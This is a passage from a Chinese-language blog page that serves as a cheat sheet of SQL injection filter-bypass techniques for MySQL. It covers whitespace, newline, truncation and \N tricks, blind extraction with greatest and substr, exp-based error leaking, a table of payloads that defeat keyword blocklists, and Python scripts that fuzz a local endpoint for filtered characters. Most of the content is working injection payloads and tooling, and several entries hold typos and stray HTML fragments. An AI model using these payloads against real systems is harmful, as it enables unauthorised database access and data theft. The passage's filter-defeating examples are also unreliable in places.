<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> `version()`,可以用来过空格和正则,特殊情况下还可以将其做注释符用</span><br></pre></td></tr></table></div></figure>
<h4 id="14-换行符绕过" >
<a href="#14-换行符绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#14-换行符绕过" class="headerlink" title="14 换行符绕过"></a>14 换行符绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">%</span><span class="number">0</span>a、<span class="operator">%</span><span class="number">0</span>d</span><br></pre></td></tr></table></div></figure>
<h4 id="15-截断绕过" >
<a href="#15-截断绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#15-截断绕过" class="headerlink" title="15 截断绕过"></a>15 截断绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">%</span><span class="number">00</span>,<span class="operator">%</span><span class="number">0</span>A,?,<span class="operator">/</span><span class="number">0</span>,........,<span class="operator">%</span><span class="number">80</span><span class="operator">-</span><span class="operator">%</span><span class="number">99</span></span><br><span class="line">目录字符串,在<span class="keyword">window</span>下<span class="number">256</span>字节、linux下<span class="number">4096</span>字节时会达到最大值,最大值长度之后的字符将被丢弃。</span><br><span class="line">.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>abcabc.<span class="number">.1</span><span class="operator">/</span>abc<span class="operator">/</span>..<span class="operator">/</span><span class="number">1</span><span class="operator">/</span>abc<span class="operator">/</span>..<span class="operator">/</span><span class="number">1</span><span class="operator">/</span>abc</span><br></pre></td></tr></table></div></figure>
<h4 id="17-N绕过" >
<a href="#17-N绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#17-N绕过" class="headerlink" title="17 \N绕过"></a>17 \N绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">\N其实相当于<span class="keyword">NULL</span>字符</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">8E0</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">8.0</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span>\Nunion <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">0</span></span><br></pre></td></tr></table></div></figure>
<h4 id="18-特殊的绕过函数" >
<a href="#18-特殊的绕过函数" class="heading-link"><i class="fas fa-link"></i></a><a href="#18-特殊的绕过函数" class="headerlink" title="18 特殊的绕过函数"></a>18 特殊的绕过函数</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span> 通过greatest函数绕过不能使用大小于符号的情况</span><br><span class="line">greatest(a,b),返回a和b中较大的那个数。当我们要猜解<span class="keyword">user</span>()第一个字符的ascii码是否小于等于<span class="number">150</span>时,可使用:</span><br><span class="line">mysql<span class="operator">></span> <span class="keyword">select</span> greatest(ascii(mid(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>)),<span class="number">150</span>)<span class="operator">=</span><span class="number">150</span>; </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> greatest(ascii(mid(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>)),<span class="number">150</span>)<span class="operator">=</span><span class="number">150</span> <span class="operator">|</span> </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">1</span> <span class="operator">|</span> </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line">如果小于<span class="number">150</span>,则上述返回值为<span class="literal">True</span>。</span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> 通过substr函数绕过不能使用逗号的情况</span><br><span class="line">mid(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)或substr(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)</span><br><span class="line">mysql<span class="operator">></span> <span class="keyword">select</span> ascii(substr(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)) <span class="operator"><</span> <span class="number">150</span>; </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> ascii(substr(<span class="keyword">user</span>() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)) <span class="operator"><</span> <span class="number">150</span> <span class="operator">|</span> </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">1</span> <span class="operator">|</span> </span><br><span class="line"><span class="operator">+</span><span class="comment">------------------------------------------+</span></span><br><span class="line"></span><br><span class="line"><span class="number">3.</span>使用数学运算函数在子查询中报错</span><br><span class="line"><span class="built_in">exp</span>(x)函数的作用: 取常数e的x次方,其中,e是自然对数的底。</span><br><span class="line"><span class="operator">~</span>x 是一个一元运算符,将x按位取补</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="built_in">exp</span>(<span class="operator">~</span>(<span class="keyword">select</span><span class="operator">*</span><span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a))mysql报错:</span><br><span class="line">mysql<span class="operator">></span> <span class="keyword">select</span> <span class="built_in">exp</span>(<span class="operator">~</span>(<span class="keyword">select</span><span class="operator">*</span><span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a));</span><br><span class="line">ERROR <span class="number">1690</span> (<span class="number">22003</span>): <span class="keyword">DOUBLE</span> <span class="keyword">value</span> <span class="keyword">is</span> <span class="keyword">out</span> <span class="keyword">of</span> <span class="keyword">range</span> <span class="keyword">in</span> ‘<span class="built_in">exp</span>(<span class="operator">~</span>((<span class="keyword">select</span> ‘root<span class="variable">@localhost</span>’ <span class="keyword">from</span> dual)))’</span><br><span class="line">这条查询会出错,是因为<span class="built_in">exp</span>(x)的参数x过大,超过了数值范围,分解到子查询,就是:(<span class="keyword">select</span><span class="operator">*</span><span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a) </span><br><span class="line">得到字符串 root<span class="variable">@localhost</span>表达式’root<span class="variable">@localhost</span>’被转换为<span class="number">0</span>,按位取补之后得到一个非常的大数,它是MySQL中最大的无符号整数</span><br></pre></td></tr></table></div></figure>
<h4 id="mysql黑魔法绕过" >
<a href="#mysql黑魔法绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#mysql黑魔法绕过" class="headerlink" title="mysql黑魔法绕过"></a>mysql黑魔法绕过</h4>
<p>select{x user}from {x mysql.user};</p>
<p><img src="../../../picture/141835089891859.png" alt="img"></p>
<p> select user from mysql.user where 1=\Nunion select@1;</p>
<p>select user from mysql.user where 1=\Nunion select-.1;</p>
<p>select~2.1from xxxx</p>
<p>select-2.1from xxx</p>
<p>select~2e1from xxx</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if((select%0b(select(xxx)``from(xxx))regexp(0x5e61)),(`sleep`(5)),0)</span><br></pre></td></tr></table></div></figure>
<h3 id="2、过滤闭合" >
<a href="#2、过滤闭合" class="heading-link"><i class="fas fa-link"></i></a><a href="#2、过滤闭合" class="headerlink" title="2、过滤闭合"></a>2、过滤闭合</h3>
<h4 id="1-过滤关键字" >
<a href="#1-过滤关键字" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-过滤关键字" class="headerlink" title="1 过滤关键字"></a>1 过滤关键字</h4>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span></span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> <span class="keyword">or</span> <span class="number">1</span>=<span class="number">1</span> <span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">1</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> || <span class="number">1</span>=<span class="number">1</span> <span class="number">1</span> && <span class="number">1</span>=<span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="number">2</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span> union</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 union select user,password <span class="keyword">from</span> users</span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users where userid=<span class="number">1</span>)=<span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"><span class="number">3</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span> union where</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span class="keyword">from</span> users where user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users limit <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"><span class="number">4</span> 过滤关键字 <span class="keyword">and</span> <span class="keyword">or</span> union where</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span class="keyword">from</span> users where user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users limit <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"><span class="number">5</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where|limit)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span class="keyword">from</span> users limit <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select user <span class="keyword">from</span> users group by user_id having user_id = <span class="number">1</span>) = <span class="string">'admin'</span><span class="comment">#user_id聚合中user_id为1的user为admin</span></span><br><span class="line"></span><br><span class="line"><span class="number">6</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where|limit|group by)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select user <span class="keyword">from</span> users group by user_id having user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && (select substr(group_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) user <span class="keyword">from</span> users ) = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="number">7</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by, select</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where|limit|group by|select)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select substr(gruop_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) user <span class="keyword">from</span> users) = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = <span class="string">'a'</span></span><br><span class="line"></span><br><span class="line"><span class="number">8</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by, select, <span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|group by|select|\<span class="string">')/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && (select substr(gruop_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) user <span class="keyword">from</span> users) = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> && user_id is not <span class="literal">null</span> <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = <span class="number">0x61</span> <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = unhex(<span class="number">61</span>)</span><br><span class="line"></span><br><span class="line"><span class="number">9</span> 过滤关键字 <span class="keyword">and</span>, <span class="keyword">or</span>, union, where, limit, group by, select, <span class="string">', hex</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|group by|select|\<span class="string">'|hex)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> && substr(user,<span class="number">1</span>,<span class="number">1</span>) = unhex(<span class="number">61</span>)</span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> &&substr(user,<span class="number">1</span>,<span class="number">1</span>) =lower(conv(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>)) <span class="comment">#十进制的11转化为十六进制,并小写。</span></span><br><span class="line"></span><br><span class="line"><span class="number">10</span> 过滤关键字<span class="keyword">and</span>,<span class="keyword">or</span>,union,where,limit,groupby,select,<span class="string">', hex, substr</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|groupby|select|\<span class="string">'|hex|substr)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> &&substr(user,<span class="number">1</span>,<span class="number">1</span>) =lower(conv(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>))/td></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> &&lpad(user,<span class="number">7</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="number">11</span> 过滤关键字<span class="keyword">and</span>,<span class="keyword">or</span>,union,where,limit,groupby,select,<span class="string">', hex, substr, 空格</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> php代码 preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|union|where|limit|groupby|select|\<span class="string">'|hex|substr|\s)/i'</span>, <span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> &&lpad(user,<span class="number">7</span>,<span class="number">1</span>)/td></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span>%<span class="number">0</span>b||%<span class="number">0</span>blpad(user,<span class="number">7</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="number">12</span> 过滤关键字andorunionwhere</span><br><span class="line"></span><br><span class="line"> php代码 preg_match(<span class="string">'/(and|or|union|where)/i'</span>,<span class="variable">$id</span>)</span><br><span class="line"></span><br><span class="line"> 会过滤的攻击代码 <span class="number">1</span> || (selectuserfromuserswhereuser_id = <span class="number">1</span>) =<span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"> 绕过方式 <span class="number">1</span> || (selectuserfromuserslimit1) =<span class="string">'admin'</span></span><br></pre></td></tr></table></div></figure>
<h2 id="0x03-FUZZ" >
<a href="#0x03-FUZZ" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x03-FUZZ" class="headerlink" title="0x03 FUZZ"></a>0x03 FUZZ</h2>
<h3 id="1-过滤字符的FUZZ" >
<a href="#1-过滤字符的FUZZ" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-过滤字符的FUZZ" class="headerlink" title="1 过滤字符的FUZZ"></a>1 过滤字符的FUZZ</h3>
<p>get</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">sql_char = [<span class="string">'select'</span>,</span><br><span class="line"> <span class="string">'union'</span>,</span><br><span class="line"> <span class="string">'and'</span>,</span><br><span class="line"> <span class="string">'or'</span>,</span><br><span class="line"> <span class="string">'sleep'</span>,</span><br><span class="line"> <span class="string">'where'</span>,</span><br><span class="line"> <span class="string">'from'</span>,</span><br><span class="line"> <span class="string">'limit'</span>,</span><br><span class="line"> <span class="string">'group'</span>,</span><br><span class="line"> <span class="string">'by'</span>,</span><br><span class="line"> <span class="string">'like'</span>,</span><br><span class="line"> <span class="string">'prepare'</span>,</span><br><span class="line"> <span class="string">'as'</span>,</span><br><span class="line"> <span class="string">'if'</span>,</span><br><span class="line"> <span class="string">'char'</span>,</span><br><span class="line"> <span class="string">'ascii'</span>,</span><br><span class="line"> <span class="string">'mid'</span>,</span><br><span class="line"> <span class="string">'left'</span>,</span><br><span class="line"> <span class="string">'right'</span>,</span><br><span class="line"> <span class="string">'substring'</span>,</span><br><span class="line"> <span class="string">'handler'</span>,</span><br><span class="line"> <span class="string">'updatexml'</span>,</span><br><span class="line"> <span class="string">'extractvalue'</span>,</span><br><span class="line"> <span class="string">'benchmark'</span>,</span><br><span class="line"> <span class="string">'insert'</span>,</span><br><span class="line"> <span class="string">'update'</span>,</span><br><span class="line"> <span class="string">'all'</span>,</span><br><span class="line"> <span class="string">'@'</span>,</span><br><span class="line"> <span class="string">'#'</span>,</span><br><span class="line"> <span class="string">'^'</span>,</span><br><span class="line"> <span class="string">'&'</span>,</span><br><span class="line"> <span class="string">'*'</span>,</span><br><span class="line"> <span class="string">'\''</span>,</span><br><span class="line"> <span class="string">'"'</span>,</span><br><span class="line"> <span class="string">'~'</span>,</span><br><span class="line"> <span class="string">'`'</span>,</span><br><span class="line"> <span class="string">'('</span>,</span><br><span class="line"> <span class="string">')'</span>,</span><br><span class="line"> <span class="string">'--'</span>,</span><br><span class="line"> <span class="string">'='</span>,</span><br><span class="line"> <span class="string">'/'</span>,</span><br><span class="line"> <span class="string">'\\'</span>,</span><br><span class="line"> <span class="string">' '</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> char <span class="keyword">in</span> sql_char:</span><br><span class="line"> res = requests.get(<span class="string">"http://127.0.0.1/get.php?query="</span>+char+<span class="string">"&submit2=sbumit"</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'Illegal Char'</span> <span class="keyword">in</span> res.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"该字符是非法字符: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"通过: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>post</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">sql_char = [<span class="string">'select'</span>,</span><br><span class="line"> <span class="string">'union'</span>,</span><br><span class="line"> <span class="string">'and'</span>,</span><br><span class="line"> <span class="string">'or'</span>,</span><br><span class="line"> <span class="string">'sleep'</span>,</span><br><span class="line"> <span class="string">'where'</span>,</span><br><span class="line"> <span class="string">'from'</span>,</span><br><span class="line"> <span class="string">'limit'</span>,</span><br><span class="line"> <span class="string">'group'</span>,</span><br><span class="line"> <span class="string">'by'</span>,</span><br><span class="line"> <span class="string">'like'</span>,</span><br><span class="line"> <span class="string">'prepare'</span>,</span><br><span class="line"> <span class="string">'as'</span>,</span><br><span class="line"> <span class="string">'if'</span>,</span><br><span class="line"> <span class="string">'char'</span>,</span><br><span class="line"> <span class="string">'ascii'</span>,</span><br><span class="line"> <span class="string">'mid'</span>,</span><br><span class="line"> <span class="string">'left'</span>,</span><br><span class="line"> <span class="string">'right'</span>,</span><br><span class="line"> <span class="string">'substring'</span>,</span><br><span class="line"> <span class="string">'handler'</span>,</span><br><span class="line"> <span class="string">'updatexml'</span>,</span><br><span class="line"> <span class="string">'extractvalue'</span>,</span><br><span class="line"> <span class="string">'benchmark'</span>,</span><br><span class="line"> <span class="string">'insert'</span>,</span><br><span class="line"> <span class="string">'update'</span>,</span><br><span class="line"> <span class="string">'all'</span>,</span><br><span class="line"> <span class="string">'@'</span>,</span><br><span class="line"> <span class="string">'#'</span>,</span><br><span class="line"> <span class="string">'^'</span>,</span><br><span class="line"> <span class="string">'&'</span>,</span><br><span class="line"> <span class="string">'*'</span>,</span><br><span class="line"> <span class="string">'\''</span>,</span><br><span class="line"> <span class="string">'"'</span>,</span><br><span class="line"> <span class="string">'~'</span>,</span><br><span class="line"> <span class="string">'`'</span>,</span><br><span class="line"> <span class="string">'('</span>,</span><br><span class="line"> <span class="string">')'</span>,</span><br><span class="line"> <span class="string">'--'</span>,</span><br><span class="line"> <span class="string">'='</span>,</span><br><span class="line"> <span class="string">'/'</span>,</span><br><span class="line"> <span class="string">'\\'</span>,</span><br><span class="line"> <span class="string">' '</span>]</span><br><span class="line">url = <span class="string">"http://127.0.0.1/get.php"</span></span><br><span class="line">header = {</span><br><span class="line"> <span class="string">'Host'</span>:<span class="string">'127.0.0.1'</span>,</span><br><span class="line"> <span class="string">'User-Agent'</span>:<span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'</span>,</span><br><span class="line"> <span class="string">'Accept'</span>:<span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'</span>,</span><br><span class="line"> <span class="string">'Accept-Language'</span>:<span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"> <span class="string">'Accept-Encoding'</span>:<span class="string">'gzip, deflate'</span>,</span><br><span class="line"> <span class="string">'Content-Type'</span>:<span class="string">'application/x-www-form-urlencoded'</span></span><br><span class="line">}</span><br><span class="line"><span class="keyword">for</span> char <span class="keyword">in</span> sql_char:</span><br><span class="line"> post_data = <span class="string">"query=test"</span>+char+<span class="string">"&submit2=sbumit"</span></span><br><span class="line"> res = requests.post(url,data=post_data,headers=header)</span><br><span class="line"> <span class="keyword">if</span> <span 